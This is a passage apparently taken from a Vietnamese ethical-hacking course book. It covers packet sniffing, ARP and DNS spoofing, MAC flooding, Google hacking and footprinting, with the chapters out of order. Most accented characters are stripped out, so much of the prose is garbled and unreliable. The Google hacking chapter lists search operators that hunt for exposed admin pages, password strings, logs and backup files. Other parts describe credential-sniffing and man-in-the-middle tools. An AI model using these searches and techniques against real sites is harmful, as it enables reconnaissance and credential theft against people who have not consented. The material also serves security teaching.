Está en la página 1de 133

CHNG 11: SNIFFER

Mt k nghe ln (sniffer) c th l cng c bt gi tin (packet) hay bt khung tin (frame). N (sniffer) chn cc gi tin trao i trong mng v hin th n nh dng Comment-line hay GUI (Graphical user interface) cho hacker c th theo di. Mt vi sniffer tinh vi th hiu cc gi tin v c th ghp cc lung gi tin thnh d liu ban u nh l e-mail hay ti liu no .

1. Sniffers l g?
Theo t in th sniff l : ngi , nh hi, nghe ln. Cn Sniffer ni chung cc phng thc bt, phn tch gi tin trn mng mt cch b mt. Sniffer s dng bt (capture) lu lng mng (traffic) trao i gia hai h thng. Ph thuc vo cch nghe ln v mc bo mt trong h thng nh th no, mt hacker c th s dng mt sniffer tm ra tn ng nhp, mt m v cc thng tin b mt khc trao i trong mng. Mt vi cuc tn cng v loi cng c hacking th i hi phi s dng sniffer ly c cc thng tin quan trng c gi t h thng m hacker nhm ti.

2. Cc phng thc d dng b sniffer


Cc phn mm nghe ln lm vic bng cch bt cc gi tin m ch khng phi l a ch MAC ca h thng (h thng ca sniffer) m l cho mt a ch MAC ca mc tiu. N c bit nh l ch hn tp (promicuous). Bnh thng, mt h thng trong mng ch c v p ng cho nhng lu lng mng c gi trc tip cho a ch MAC ca n. Nhng ch hn tp, h thng c tt c cc lu lng mng v gi n n sniffer x l. Ch hn tp c bt card mng bng s ci t ca phn mm iu khin c bit. Mt vi cng c hacking sniffing bao gm b phn iu khin ch hn tp thun tin cho cng vic ca n. Mt vi phng thc khng m ha d liu th rt d dng b sniffing. Cc phng thc nh HTTP, POP3, SNMP (Simple Network Manager Protocol), v FTP l nhng phng thc ph bin rt d b bt cc gi tin bng cch s dng sniffer v theo di bi mt hacker ly cc gi tr thng tin nh tn s dng hay mt m.

Hacking Tool

Ethereal: l mt phn mm nghe ln min ph c th bt cc gi tin t cc kt ni LAN c dy v khng dy. Phin bn cui cng c i tn thnh s. Ethereal l mt chng trnh ph bin v c a thch bi v n min ph nhng c vi mt hn ch. Mt vi user khng c nhiu kinh nghim c th cm thy kh khn vit cc b lc trong Ethereal bt ch mt vi loi gi tin truyn qua mng. Snort: l mt h thng pht hin xm nhp (Intrusion Detection System) cng c kh nng sniffing. N c th s dng pht hin hng lot cc cuc tn cng v c gng d tm, nh l trn b m , qut cng n, tn cng GI, thm d SMB (Server Message Block). Windump: l phin bn Windows ca tcpdump, dng lnh (tcpdump) phn tch mng ca Unix. Windump th hon ton ging nh tcpdump v c th s dng theo di, chun on, v lu lu lng mng vo a theo nhng quy tc khc nhau. Etherpeek: l mt cng c sniffer tuyt vi cho mng c dy vi b lc m rng v kh nng theo di cc cuc hi thoi TCP/IP. Phin bn mi nht ca Etherpeek c i tn thnh OmniPeek. Winsniffer: l mt cng c sniffer password rt hiu qu. N theo di lu lng mng vo v ra ca h thng v gii m FTP, POP3, HTTP, ICQ, SMTP (Simple Mail Tranfer Protocol), telnet, IMAP (Internet Message Access Protocol), v NNTP (Network News Tranfer Protocol), tn ngi dng v mt khu. Iris: l mt phng thc phn tch lu lng mng v d liu tt, n thu thp, lu tr t chc v bo co tt c cc d liu lu thng trong mng. Khng ging nh cng c sniffer khc, Iris th c th to li cc lu lng mng, nh l ha, ti liu, v e-mail bao gm cc file nh km.

3. K thut Sniffing
C hai loi sniffer khc nhau: ch ng v b ng. Passive Sniffing lin quan n cc cng vic lng nghe v bt cc lu lng mng v n th rt hu dng trong kt ni mng s dng Hubs. Active Sniffing lin quan n vic thc hin nh la giao thc phn gii a ch (ARP), hay tn cng lm trn lu lng trong switch nhm bt cc lu lng trong mng. Ging nh ci tn ca n, Active sniffing th c th b pht hin nhng passive sniffing th khng . Trong mng s dng Hubs hay thit b mng khng dy lm h thng kt ni. Tt c cc my ch trong mng th c th nhn thy tt c cc lu lng; v vy mt active sniffer c th bt cc lu lng gi n v gi i t tt c cc my ch kt ni thng qua hub.

Mng s dng Switch th c s hot ng khc bit. Switch th theo di d liu c gi n n v c gng gi tip cc gi tin n cho cc im ch c xc nh bng a ch MAC. Switch th khng i bng a ch MAC ca tt c cc h thng v s cng m chng dng kt ni. N th cho php switch c th chia nh mng thnh cc on v ch gi d liu cho ch n c a ch MAC chnh xc. Mt mng s dng switch th c th lm tng lng lu thng trn mng tt hn v bo mt hn so vi mt mng chia s dng hubs.

ARP poisoning
ARP cho php kt ni mng c th d tm a ch IP ra thnh a ch MAC. Khi mt my ch s dng TCP/IP trong mng LAN c gng lin lc vi nhng my khc, n th cn a ch MAC hoc a ch phn cng ca my ch m n c gng kt ni. u tin n tm trong b nh ARP ca n tm a ch MAC nu a ch MAC tn ti; Nu a ch MAC khng tn ti, n (my ch cn kt ni ) lan truyn mt yu cu ARP hi : Ai c a ch IP ti ang cn?. Nu my ch c a ch IP lng nghe c cu hi ARP, n s p ng vi a ch MAC ca n v mt phin kt ni s dng TCP/IP c th bt u.

ARP poisoning l mt cng ngh, n dng tn cng mt mng Ethernet, n cho php mt hacker c th nghe ln d liu trong mng LAN s dng Switch hoc c th dng ton b lu thng trn mng. ARP poisoning s dng ARP spoofing( gi mo) vi mc ch l gi gi hoc gi mo, tin nhn ARP cho mng LAN Ethernet. Cc gi tin cha a ch MAC khng ng to s nhm ln ca cc thit b mng nh l cc thit b chuyn mch mng (switch). Kt qu l gi tin uc gi ti cho mt my c th b nhm ln sang mt my khc (cho php nghe ln cc gi tin) hoc khng gi n c my ch (tn cng DoS). ARP spoofing c th s dng trong tn cng Man in the middle, trong tt c cc gi tin lu thng qua mng c i qua mt my ch bi cch thc hin ca ARP spoofing v b phn tch tm ra mt khu v thng tin khc.

trnh khi cc cuc tn cng ARP spoofing, phi thng xuyn thm a ch MAC ca gateway vo b nh ARP trong h thng. Bn c th thc hin cng vic trn h thng Windows bng cch s dng lnh : ARP s ti ca s dng lnh (comman line) v ni thm vo a ch IP v a ch MAC ca gateway. Lm nh vy s trnh c hacker ghi b nh ARP thc hin ARP spoofing trn h thng nhng n li tr nn kh khn khi qun l trong mt mi trng ln v s lng ca h thng. Trong mi trng doanh nghip, vic bo mt da trn port c th c kch hot trn switch ch cho php 1 a ch MAC trn 1 port.
Hacking Tool

C ba cng c ph bin dng thc hin ARP Spoofing c th k n nh:


Arpspoof: Cng c dnh cho h iu hnh Linux Ettercap: c Windows v Linux ArpSpyX: H iu hnh MAC OS

Ethereal l phn mm sniffer min ph c th bt cc gi tin trong kt ni LAN c dy hay khng c dy. Mt vi v d v b lc Ethereal: Ip.dst eq www.eccouncil.org bt cc gi tin n webserver www.eccouncil.org Ip.src == 192.168.1.1 bt cc gi tin n t my ch 192.168.1.1 Eth.dst eq ff:ff:ff:ff:ff:ff bt cc gi tin broadcast layer 2

MAC flooding
Sniffer mt gi tin trong mng s dng switch khng th bt tt c lu lng mng nh l n c th lm trong mng s dng Hub; thay vo , n bt cc gi tin i vo hoc i ra khi h thng. N th cn thit phi s dng mt cng c (thm additional) bt tt c cc lu lng mng trong mng s dng switch. V c bn th c 2 cch thc hin cng vic active sniffer v bt switch gi lu lng mng chy qua switch v cho h thng ang dng sniffer ARP spoofing v flooding. Nh ni trn : ARP spoofing tc ng n a ch MAC trn cng vo ca mng (gateway) v do nhn c tt c lu lng mng a n cho gateway trn h thng sniffer. Mt hacker cng c th lm trn mt Switch vi rt nhiu lu lng mng lm cho n ngng hot ng nh Switch m thay vo n hot ng nh mt Hub, gi tt c lu lng mng cho tt c cc port. Cuc tn cng Actice sniffing cho php mt h thng vi mt sniffer bt tt c lu lng mng.

K thut DNS Spoofing


DNS spoofing (DNS poisioning) l 1 k thut nh la DNS server tin rng n th nhn c cc thng tin chng thc trong khi n th cha h nhn c s chng thc . Mt khi DNS server b u c, cc thng tin thng b lu tr trong 1 khong thi gian, sau s lan rng nh hng ca cuc tn cng ti cc ngi dng ca server. Khi ngi dng yu cu 1 a ch website c th no , a ch s d trn DNS server tm a ch IP tng ng. Nu DNS server b xm nhp, ngi dng s c chuyn n 1 trang web khc trang web yu cu, v d l 1 trang web gi. thc hin mt cuc tn cng DNS, k tn cng s khai thc mt l hng trong phn mm my ch DNS lm cho n chp nhn cc thng tin khng chnh xc. Nu my ch khng phn ng chnh xc cc yu cu DNS m bo rng h n t nhng ngun ng tin cy, my

ch s kt thc b nh m khng ng v phc v cho nhng ngi dng c yu cu tip theo. K thut ny c th s dng thay th ni dung ty cho mt tp hp cc nn nhn vi ni dung ty thuc vo la chn ca k tn cng. V d, mt k tn cng u c DNS ca cc a ch IP cho mt trang web mc tiu trn mt DNS server nht nh, thay th chng (IP) bng cc a ch IP ca my ch do hacker iu khin. K tn cng sau s tao ra cc tp tin gi trn my ch ny vi vi tn (file) th trng vi tn file trn my ch b tn cng. Nhng tp tin ny c th cha cc ni dung c hi, nh l worm hay virut. Mt ngi s dng my tnh truy cp vo my ch DNS b u c th bi la vi suy ngh l ci ni dung c cung cp bi my ch b tn cng v v tnh downloads cc tp tin c ni dung c hi. Cc kiu k thut tn cng DNS spoofing : Intranet spoofing hot ng nh 1 thit b cng thuc mng ni b.

Internet spoofing hot ng nh 1 thit b trn Internet.

u c server DNS proxy sa i cc mc DNS trong proxy server chuyn ngi dng sang mt h thng my ch khc.

u c b nh DNS sa i cc mc DNS mt vi h thng chuyn ngi dng sang mt h thng khc.


Hacking Tools

EtherFlood c s dng lm trn mt Ethernet switch vi lu lng mng lm cho n tr thnh Hub. Bng cch ny, mt k tn cng c th bt tt c cc lu lng trong mng m theo quay lut th n l ch bt cc lu lng n v i t h thng ca h, nh l mt trng hp ca swith. Dsniff l mt tp hp cc cng c thit k Unix-executable thc hin kim sot h thng mng nh l s xm nhp mng. Cc cng c di y th c cha trong Dsniff : filesnarf, mailsnarf, msgsnarf, urlsnarf, v webspy. Nhng cng c ny th gm st th ng mt mng chia s d b xm nhp (nh l mt mng LAN ni m sniffer sau bt k mt tng la no nm bn ngoi) ly i cc d liu cn thit (password, email, files, v ). Sshmitm v wevmitm k tha man-in-the-midle ch ng tn cng chng li vic chuyn hng cc SSH (secure shell) v phin HTTPS.

Arpspoof, dnsspoof , and macof lm vic nhm chn cc lu lng mng i qua 1 switch m thng th khng c 1 chng trnh sniffer no bi v tnh cht ca switch. bit c cc vn xung quanh vic chuyn mch gi layer 2, dsniff gi mo cc thit b rng n l 1 gateway m d liu phi chy qua n i ra bn ngoi mng. IP restrictions Scanner (IRS) thng c s dng d tm s gii hn IP c thit lp cho tng dch v ring trn my ch. N phi hp u c ARP vi TCP n hoc k thut half-scan v kim tra tng tn cc kt ni TCP gi mo la chn cng ca mc tiu. IRS qut tm my ch v cc thit b mng nh Routers, Switchs m xc nh cc c im kim sot truy cp nh access-control list(ACLs), b lc IP, v cc quy tc tng la. sTerm l 1 Telnet client vi cc tnh nng c o : n c th thit lp mt phin Telnet hai chiu n my ch mc tiu, m khng bao gi gi a ch IP tht v a ch MAC tht trong bt c gi no. S dng ARP poisoning , MAC spoofing, v cng ngh IP spoofing, sTerm c th thc s trnh c ACLs, quy tc tng la, v vic gii hn IP trn my ch m cc thit b mng. Cain & Abel l nhng cng c tn cng a nng trn windows. N cho php d dng khi phc cc loi mt khu khc nhau bng cch nghe ln trn mng. B cc mt khu c m ha s dng t in, brute-force (Trong lp trnh my tnh, y l phng php nhm gii quyt mt bi ton kh bng cch lp i lp li mt th tc n gin nhiu ln. My tnh tin hnh kim tra li chnh t bng phng php brute force (bt p th bo) ny. Chng khng kim tra chnh t thc s, m ch so snh tt c cc t trong ti liu ca bn vi cc t ca mt t in chnh t ci sn.); ghi m cc cuc gi VoIP, gii m cc mt khu c xo trn, tm ra cc hp mt khu, pht hin ra cc mt khu c lu tr trong b nh v phn tch cc phng thc nh tuyn. Phin bn cui cng bao gm nhiu c im mi ging nh ARP poisoning Routing(APR) , n th cho php sniffing trong switch ca mng LANs v tn man-in-the-middle. Cc sniffer trong phin bn ny cn c th phn tch cc phng thc m ha nh: SSH-1 v HTTPs, v n bao gm cc b lc bt cc thng tin xc thc(credential) t mt mng ln cc c ch xc thc. Packet Craffer l mt cng c thng c s dng to ra cc gi tin TCP/IP/UDP ca khch hng. Cng c ny c th thay i a ch ngun ca cc gi tin thc hin vic IP spoofing v c th iu khin IP flags v TCP flags, s th t(sequence numbers), s ASK(ask number). SMAC l mt cng c c th thay i a ch MAC ca h thng. N gip cho hacker gi mo a ch MAC khi thc hin cuc tn cng. MAC Changer l mt cng c c s dng gi mo a ch MAC trn Unix. N c th s dng thit lp cc a ch MAC c th cho tng interface khc nhau, thit lp a ch MAC ngu nhin , thit lp a ch MAC ca mt nh cung cp khc, thit lp mt a ch MAC khc ca cng nh sn xut, thit lp 1 a ch MAC cng loi hoc thm ch hin th danh sch a ch MAC ca nh cung cp chn la.

WinDNSSpoof l cng c gi mo DNS ID n gin dnh cho Windows . s dng n trong mng s dng Switch , bn phi c kh nng Sniff lu lng mng ca my b tn cng. Do , n c th c kt hp vi 1 cng c ARP spoofing hay flooding. Distributed DNS Flooder gi mt s lng ln cc truy vn to ra 1 cuc tn cng DOS(denies of service), v hiu ha DNS. Nu phn mm Deamon truy vn cc bn ghi(logs) khng chnh xc, nh hng ca cuc tn cng s c khuch i.

4. M t cc bin php phng chng Sniffing


Cch bo mt tt nht phng chng li mt Sniffer trong mng l s m ha. Mc d s m ha khng trnh khi s Sniffing, nhng n lm cho bt k d liu no b bt bng sniffing tr nn v dng bi v hacker khng th hiu c thng tin . S m ha nh l AES v RC4 hoc RC5 c th s dng trong cng ngh VPN v l nhng tiu chun chung phng chng Sniffer.
Countermeasures Tool

netINTERCEPTOR l mt tng la chng li spam v virus. N c nhiu la chn b lc nng cao v c th hc hi v thch ng v n c th nhn c cc loi th rc mi (spam). N cng ngn chn v cch ly cc e-mail mi nht b nhim Trojan, ngn chn Trojan khi s ci t v c th ci t 1 sniffer. Sniffdet l vic thit lp s kim tra pht hin Sniffer t xa trong mi trng TCP/IP. Sniffdet thc hin cc bi kim tra khc nhau pht hin cc my(machines) chy ch romiscuous hay vi mt Sniffer. WinTCPKill l mt cng c chm dt kt ni TCP trn windows. Cng c ny i hi kh nng s dng mt Sniffer sniff cc lu lng n v i ca my b tn cng. Trong mng s dng Switch, WinTCPKill c th s dng mt cng c u c b nh ARP (ARP cache poisoning) thc hin vic ARP spoofing.

5. Tng kt bi hc
Lm sao Sniffer: mt sniffer hot ng ch hn hp(promiscuous), ngha l n bt tt c cc lu lng m khng ch ti MAC ch trong cc frame. S khc nhau gia sniffing trn mt mng s dng hubs v mng s dng switch : tt cc cc lu lng th c broadcast bi Hubs, nhng n th c chia lm nhiu segment bi mt switch. Sniff trong mng s dng Switch, th cc cng c Flooding hay ARP Spoofing phi c s dng. S khc bit gia active sniffing v passive sniffing:

Active Sniffing s dng la Switch b tn cng thnh 1 Hub switch gi tt c c lu lng mng n k tn cng.

Passive sniffer: bt cc gi tin c broadcast trn mng

///////////

CHNG 3: GOOGLE HACKING


Nguyn Tn Thnh Ai trong chng ta cng u bit, Google l mt g khng l trong lnh vc tm kim. Ngi ta c th tm thy mi thng tin t Google. T nhng chuyn to ln, n nhng chuyn nh nhc nht cng c th tm c trn Google. Bt k thng tin g, min l n hin th ra trang web th u c google tm thy. Chng trc, chng ta c nhc n k thut theo di Footprinting, v sau ny bn gp mt ch l Social engineering , c hai lnh vc ny u c mt phn ng dng t Google tm kim thng tin, phc v cho nhu cu tn cng h thng. Li dng vo b my tnh kim Google truy tm tng tch i tng, thm ch l dng Google tn cng h thng. chnh l Google Hacking. Vi kh nng tm kim li hi ca Google, hacker c th tm thy nhiu thng tin hu ch, cho qu trnh theo di mc tiu v tn cng vo i tng. Chng ny s trnh by nhng th thut tm kim ni tri ca Google, c ngha i vi mt hacker. T vic lm th no bn tm c thng tin ca mc tiu, th bn s rt cho mnh kinh nghim lm th no khng cho thng tin b r ra bn ngoi.

1. Google Hacking L G ?
Ni tm li, Google hacking thc hin nhng cng vic nh:

S dng b my tm kim truy tm thng tin ca i tng cn theo di. Cng l b my tm kim, vi nhng c php tm kim c bit c th gip hacker tm thy nhng thng tin c bit c lin quan n bo mt, nh username, computername, password, page logon S dng Google thc hin cc v tn cng, iu ny c lm nh th no, h hi phn gii.

Nhng thng tin c ch tm Chc nng tm kim ca Google rt ln, ty vo phm tr lnh vc m chng ta quan tm n nhng d liu no. Trong Hacking, chng ta cn ch n nhng d liu nh sau:

S c mng v nhng thng tin lin quan n cc server c l hng bo mt. Nhng thng bo li (erro message) c cha nhiu thng tin quan trng. File c cha mt khu.

Th mc c ni dng nhy cm nh config, system Trang ng nhp (logon page) vo website. Trang cha thng tin mng hoc d liu nhy cm nh Firewall log

Google vi kt qu tm kim Vi Google, g t kha tm kim cng t th kt qu cng nhiu, ngc li t kha di s cho kt qu t hn. Kt hp nhng t kha tm kim c bit, nhng c php tm kim ca Google s gii hn phm vi tm kim, v c kt qu chnh xc, nhanh hn. Kt qu tm kim ca Google thng rt l ln. Con s vi ngn l chuyn bnh thng. Tuy nhin, c bao gi bn xem n nhng trang kt qu cui cng cha. Chc chn l cha, v bn cha kin nhn. Nhng chnh nhng ni ho lnh t ngi n , li n cha nhng b mt m hacker nn n. Vi t kha tm kim l administrator, nhng trang u tin, bn c th thy nhng bi vit bnh thng trn mng c lin quan n t administrator. Nu chu kh n nhng trang kt qu cui cng, bn c th tm thy thng tin ca administrator ang qun l mt website no . Hoc vi t kha username, chng ta c th tm thy mt username ng nhp h thng.

2. Google Hacking Basic


By gi chng ta s bt u tr chi tht s. Nhng chuyn tng chng nh n gin l tm kim trn Google, li c th mang li nhiu th cho hacker. Ngay sau y, bn s tm hiu v cc k thut hacking ca google. N n gin l cc chc nng qu hay ca Google m thi.

Anonymity with Caches


Chc nng Cache tht s l qu tuyt vi ca Google. Google lu li nhiu website m bn v nhng ngi khc truy cp. Bt c khi no, bn u c th xem li trang web c lu trong b nh cache ny ca google, ngay c khi n b xa khi server trn mng. V nh ni Google Cache lu li mi th.

Hnh 3. 1: Tt c mi th u c lu li trong Cache Google lu li mi d liu m n thu thp c. C n hng Tegabyte d liu web b r r hng nm. Hacker c th li dng vo Google thc hin mt cuc tn cng n danh. Bn ng mt thng tin ln website ca mnh. Mt thi gian khng lu sau , bn xa trang i, v khng mun tin ny pht tn na. Th nhng mi ngi vn xem c nhng thng tin do bn ng ln. H khng xem trc tip t website ca bn m xem trong b nh cache ca Google. Bn vo trang in thng tin c nhn khi ng k tham gia mt trang web bn hng trc tuyn. Tht tai hai, khi thng tin ca bn c nh cung cp dch v bn hng ha l gi b mt,

m n vn b r r ra bn ngoi. Chuyn g xy ra? chnh l v bn b Google cache thng tin ca bn li, khi bn vo xem trang thng tin ca mnh. Ni tm li, nhiu thng tin nhy cm ca bn v ca cng ty, t chc c th b Google cache li. V n lc no bn khng mun n xut hin trn internet na, th n li vn cn xut hin thng qua b nh cache ca google. Nu mt hacker tinh khn, anh ta c th tm thy nhiu thng tin hu ch lu trong b nh cache ny.

S Dng Google Nh Mt Proxy Server


S dng chc nng ny chng ta s tm hiu n cng c Translate ca google, ti a ch http://translate.google.com.vn Chng ta u bit n dng dch on vn bn. Nhng nu ch c vn bn khng, th chng ta khng c Proxy Server. Chc nng Translate ca Google cn cho php dch c mt trang web. in a ch trang web vo khung dch vn bn, Google s gip chng ta dch c trang web . Khi y, chng ta ang truy cp vo website khng i trc tip t my ca mnh, m thng qua mt my khc l Google. Trong trang v d di y, ti s truy cp vo trang web www.uit.edu.vn thng qua Google Translate.

Hnh 3. 2: Kt qu truy cp website www.uit.edu.vn thng qua Google Translate Bn c thc mc l ti sao ti li dch t ting Anh sang ting Vit hay khng. chnh l v ti mun xem trang web ca mnh trong ting Vit, ting gc ca trang web. Bn s gp thng bo li khi c dch trang web ting Vit sang ting Vit. Xem xt mt kt qu ca trnh tcpdump (trnh bt gi tin), n th hin qu trnh giao tip gia my tnh ca bn vi internet, khi bn truy cp website trn.

Hnh 3. 3: Kt qu TcpDump u tin my tnh ca bn (192.168.2.32:53466) gi yu cu n web server (64.233.171.104:80) y l my ch ca Google, v ton b qu trnh giao tip chuyn d liu khng h xut hin my ch uit.edu.vn.

Directory Listings
Directory Listings l mt website c bit, n hin th danh sch cc file v th mc tn ti trn server. c im ca website kiu ny l khng cn lp trnh, thit k web phc tp. N

c dng trong cc trng hp chia s ti nguyn. Cng ging nh FTP, chng ta hon ton phn quyn c trn cc file v directory ny.

Hnh 3. 4: Kt qu ca Directory Listings mt website Hu ht cc ng dng webserver s hin th danh sch th mc nh th khi trong a ch truy cp khng c trang mc nh (default page). Nhng trang mc nh nh index.php, default.html khng c ngi lp trnh web a vo th mc. Tht l tai hi khi th mc c cha nhng tp tin quan trng, nh config.php. Nu bn l ngi pht trin website th hy c bit ch n vn ny. C nhiu cch nu bn khng mun lit k th mc trong trnh duyt kiu ny. n gin l thm file default page rng vo th mc. Khi ngi dng truy cp vo th mc ch thy mt trang ni dung trng. Cch khc l dng file cu hnh .htaccess tm kim nhng trang web nh th bn c th s dng t kha index of / Ti sao nh vy. Hy xem hnh 3.4, bn thy cc trang web hin th th mc u c phn ni dung l index of Tm kim th mc v tp tin c bit l nhng th mc nh adminitrator, configuration, hay nhng file *.log, *.sys, *.conf Nu mun tm nhng thc mc c bit nh th c th kt hp thm t kha intitle: V d c php: intitle: index of admin hoc intitle: index of inurl: admin s cho chng ta kt qu l nhng trang web c lin quan n trang qun tr ca website. C php intile: index of ws_ftp.log s gip chng ta tm kim file ws_ftp.log

Hnh 3. 5: Kt qu tm kim th mc c bit Server version Tm kim thng tin phin bn ca ng dng pha server s gip cho hacker c k hoch tn cng tt hn. C nhiu cch tm kim thng tin server:

Da vo HTTP Header cng c th tm thy s phin bn ca ng dng. Mt vi cng c d tm (scanning) cng c th gip . Trong chc nng Directory Listings trn cng c hin th thng tin server di, xem li hnh trn chng ta s thy r dng thng tin phin bn ca ng dng l: Apache / 2.0.52 (Unix) Server at xml.apache.com C ngha l server ang chy h iu hnh Unix, ng dng Apache phin bn 2.0.52 cho webserver, v web server c a ch l xml.apache.com.

tm kim thng tin phin bn ng dng, c th dng c php Server at V d nh intitle: index of / server at

Directory Traversal
Travel l du lch, Directory Traversal c th tm hiu l i do qua cc th mc. l gii cho vn ny, chng ta cng quay li vi kt qu ca Directory Listing hnh di y.

Hnh 3. 6: Kt qu hin th ca Derectory Listing Kt qu ny ang hin th danh sch th mc cho ng dn /bpa/acadunits/admin/envr/bowman. Nu , chng ta thy c th mc admin nm trn th mc hin hnh hai cp. V chng ta cn thy mt lin kt Parent Directory ngay hng u. u c ngha l nu bm vo lin kt ny, chng ta c th i n c th mc admin, v cn c th duyt qua tt c cc th mc khc. n y, c th hiu Traversal l mt k thut m rng kt qu tm kim, t mt mc tiu nh. Bng cch s dng cng c tm kim ca Google, khng kh bn tm n nhng th mc nh th. V d vi cu trc tm kim l site:cl.uh.edu inurl:bpa/acadunits/admin ws_ftp.log chng ta c th tm thy nhiu file c bit, v nhiu hn na nhng thng tin cn thit. c th duyt ht cy th mc, chng ta cn mt cch na, l thay i vi ni dung trong URL. V d bn c th thay i t admin trn thnh nhng t khc c ngha nh student, public, teacher Incremental Substitution y cng l mt k thut dng duyt file v th mc. Cng bng cch suy lun, v thay i nhng k t cn thit trong ng dn URL, chng ta c th tm thy nhng file hoc th mc cn thit. V d: Bn tm thy file vi ng dn l /docs/bulletin/2.xls Vy nu thay i thnh /docs/bulletin/3.xls th chng ta c kh nng tm thy c file 3.xls. Mt v d khc, bn tm thy ng dn /DigLib_thumbnail/spmg/hel/0001/H/ Th thay i thnh /DigLib_thumbnail/spmg/hel/0002/H/ Bit u s tm thy nhng iu bt ng. Bng c php tm kim letype:xls inurl:1.xls or intitle:index.of inurl:0001 Bn c th tm thy nhng file khc tng t nh vy.

Hacking Tool

Mt vi cng c download, nh IDM (Internet Download Manager), c chc nng gip ngi dng tm v ti nhiu file ch c mt phn ng dn thay i. V d bn c tm ti tt c cc file c ng dn l .tuoitre.vn/save/media/radio/radio-*.mp3 Trong du * i din cho k t t 001 n 099 Extension Walking Bn th dng c php filetype ca Google. Nhim v ca c php ny, l tm kim tp tin c phn m rng c ch nh. Chng hn nh filetype: HTML s tm nhng file c phn m rng l HTML. Nh vy, nu bn bit rng, vi nh dng file c ni dung quan trng nh .bak, .sql, .conf Bn c th bt u truy lng ra chng. V d bn dng c php intitle:index.of index.php.bak C th chng ta s thy c nhng iu b n.

3. Google Advanced Operator


Chc hn rng, ai trong chng ta cng t quen thuc vi nhng c php tm kim thng dng ca Google. p dng nhng c php , c th gip mnh ra kt qu nhanh hn, chnh xc hn. Tuy nhin, vi c php sau y th thch hp cho hacker hn. Site L ton t dng tm kim thng tin trong mt site. iu ny gip chng ta gii hn phm vi tm kim li. V d c php site: uit.edu.vn s gii hn phm vi tm kim trong trang web uit.edu.vn Intitle:index of C php ny c dp chng ta s dng tm kim th mc. N cng c xem l c php li hi dnh cho hacker Error | Warning y l hai c php dng tm kim thng tin li. Mt vi thng bo li khi lp trnh s to mt l hng cho hacker tha c t nht. Login | Logon C php dng tm trang logon. N c th ch l trang p nhp website bnh thng, nhng cng c th l trang ng nhp vo mt h thng c bit hn. ng trc ca ri, vic tn cng vo trong th no cn ty thuc vo nhiu th. Username | Userid | employerID | your user name

y l mt lot cc c php tm kim user name ng nht h thng. Ti sao chng ta tm c. l do vi li khng ca ngi lp trnh. V d anh ta v tinh cho hin th thng bo Ti khon tranvanteo vn cha kch hot Password | Passcode | Your password is Cng tng t nh c php v username. Chng ta d dng tm thy nhng cu thng bo i loi nh l Your password is AHTlkYu Admin | Administrator Chng ta c khoanh vng tm kim nhng thng tin c lin quan n admin vi t kha ny. Nhng trang qun tr dnh cho admin, nhng thng tin ca admin, v nhiu th khc c lin quan n admin. Kt hp vi chc nng cache ca Google, hiu qu cng vic s tng ln. ext:html ext:htm ext:shtml ext:asp ext:php V cn nhiu hn na nhng c php c lin quan n ext. C php ny gip chng ta tm thy nhng file m chng ta mun. Vi hacker nhng file c th k n nh php, html, bak, conf, sys inurl:temp | inurl:tmp | inurl:backup | inurl:bak Cng ging nh vi ext, nhng khng tm theo file na m tm theo th mc. Nhng th mc m hacker quan tm nh temp, backup, admin, conf intranet | help.desk Thng tin c lin quan n b phn helpdesk ca cng ty cng khng th b qua trong cuc tn cng. C php ny gip chng ta tm thy nhiu thng tin c lin quan n b phn helpdesk.

4. Google Hacking Tool


Vic phi ghi nh nhng c php tm kim c bit dnh cho hacker trn y lm chng ta kh chu. Rt may l nhiu cng c h tr chng thc hin nhng cu truy vn tm kim d dng hn.

Hnh 3. 7: Trang web Google Hacking Database Hnh 3. 8: Giao din ca GooLink u tin v cng ng gm nht l Google Hacking Database. Ti y tp hp kt qu tm kim ca hng ngn l hng bo mt, nhng file c cha username, nhng trang logon,

nhng file c cha ni dung quan trngTruy cp vo website http://johnny.ihackstuff.com khai thc c s d liu khng l ny. SiteDigger Tool, Gooscan, Goolink Scanner l nhng cng c hu ch khc, cho php chng ta thc hin qu trnh tm kim vi nhng cu lnh c th hn, chuyn bit hn ca hacker. Google Hack: y l cng ng ca Google Hack ti a ch http://code.google.com/p/googlehacks Cng vi cng c m cc nhm cung cp, s gip chng ta khai thc ti a tin ch ca google trong qu trnh tm kim v tn cng h thng. Cng c Google Hack chng nhng cho php chng ta tm kim thng tin m cn cho php s dng Google nh l mt Proxy Server.

Hnh 3. 9: Giao din ca Google Hacks

5. Tng kt
Kt thc phn ny, chng ta cn hiu r cc vn sau:

Google l mt cng c tm kim mnh m, nhng cng v mnh m m n tr thnh mt cng c tn cng ca Hacker. S dng cng c ca Google to thnh mt Proxy Server, dng trong trng hp cn truy cp web n danh. C nhiu th thut tm kim khc nhau, cho chng ta kt qu mong i. Nhng k thut tm kim th mc, tm kim phin bn serverNhng ton t v t kha quan trng, nn bit, cng c s dng trong tm kim khoanh vng tm kim.

//////////////////

CHNG 2: FOOTPRINTING
bt u tn cng h thng, bn cn thc hin 3 bc: In du chn, Qut, Lit k. Trc khi i vo tr a tht s, bn hy hiu s lc cc cng vic ny. C th by gi chng ta s tm hiu v k thut in du chn (footprint). V d mt tn cp mun nh cp ngn hang, chng khng th bc vo v i tin, m chng s dc sc thm do cc thng tin t ngn hng . Thng tin m hn thu thp c th l tuyn ng m xe bc thp i qua, gi phn pht, s th qu, v nhng thng tin khc gip phi v thnh cng.

Yu cu trn cng p dng cho mt k tn cng trn mng. Chng phi ra sc thu thp cng nhiu thng tin cng tt v mi gc cnh bo mt ca t chc. Kt qu thu c s gip cuc tn cng trt lt hn. Bng cch d theo du chn, nhng b lu tr trn internet, truy cp t xa, cngvi s hin din ca internet k tn cng c th gp nht mt cch c h thng cc thng tin t nhiu ngun khc nhau v mt t chc no .FootPrinting l g ? Footprinting l mt phn ca giai on tn cng c chun b trc v bao gm vic tch ly d liu v mi trng ca mt mc tiu v kin trc, thng thng vi mc ch tm cch xm nhp vo mi trng . Footprinting c th tit l cc l hng h thng v xc nh d dng m chng c th c khai thc. y l cch d nht cho cc hacker thu thp thng tin v nhng h thng my tnh v cc cng ty m h thuc v. Mc ch ca giai on chun b ny l tm hiu cng nhiu cng tt nh bn c th v mt h thng, kh nng truy cp t xa ca n, port v dch v ca mnh, v bt k kha cnh c th v bo mt ca n.

1. Phm tr ca Footprinting
